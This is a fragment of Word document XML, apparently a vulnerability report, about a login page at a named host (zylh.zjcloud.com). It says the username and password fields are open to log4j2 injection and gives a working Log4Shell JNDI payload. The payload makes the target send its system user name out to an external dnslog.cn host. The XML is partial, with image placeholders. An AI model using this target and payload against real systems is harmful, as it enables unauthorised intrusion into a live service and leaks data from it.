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0CE6" w14:textId="70BE697F" w:rsidR="001B79E1" w:rsidRDefault="00431D45">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>rl:</w:t>
      </w:r>
      <w:r w:rsidRPr="00431D45">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:anchor="/login" w:history="1">
        <w:r w:rsidRPr="008B79D7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://zylh.zjcloud.com:10068/#/login</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53E2100B" w14:textId="0A2FFEF4" w:rsidR="003E5277" w:rsidRDefault="003E5277">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E548C83" wp14:editId="0A52E2C8">
            <wp:extent cx="5274310" cy="1069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836D" w14:textId="096AA0B8" w:rsidR="00431D45" w:rsidRDefault="00431D45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录框账号和密码处l</w:t>
      </w:r>
      <w:r>
        <w:t>og4j2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA46D36" w14:textId="4AC71B89" w:rsidR="00431D45" w:rsidRDefault="00431D45">
      <w:r w:rsidRPr="00431D45">
        <w:t>${jndi:ldap://${sys:user.name}.bw72m9.dnslog.cn/test}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53783C12" w14:textId="02BBE597" w:rsidR="00431D45" w:rsidRPr="00431D45" w:rsidRDefault="00431D45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D6380C2" wp14:editId="0079E6E4">
            <wp:extent cx="5274310" cy="254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45" w:rsidRPr="00431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7E"/>
    <w:rsid w:val="001B79E1"/>
    <w:rsid w:val="003E0F7E"/>
    <w:rsid w:val="003E5277"/>
    <w:rsid w:val="004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8D93"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0081489C-50A0-410A-8ACF-7D559277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D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1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ylh.zjcloud.com:1006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我要开GTR</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>我要开GTR</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-23T01:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-26T02:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>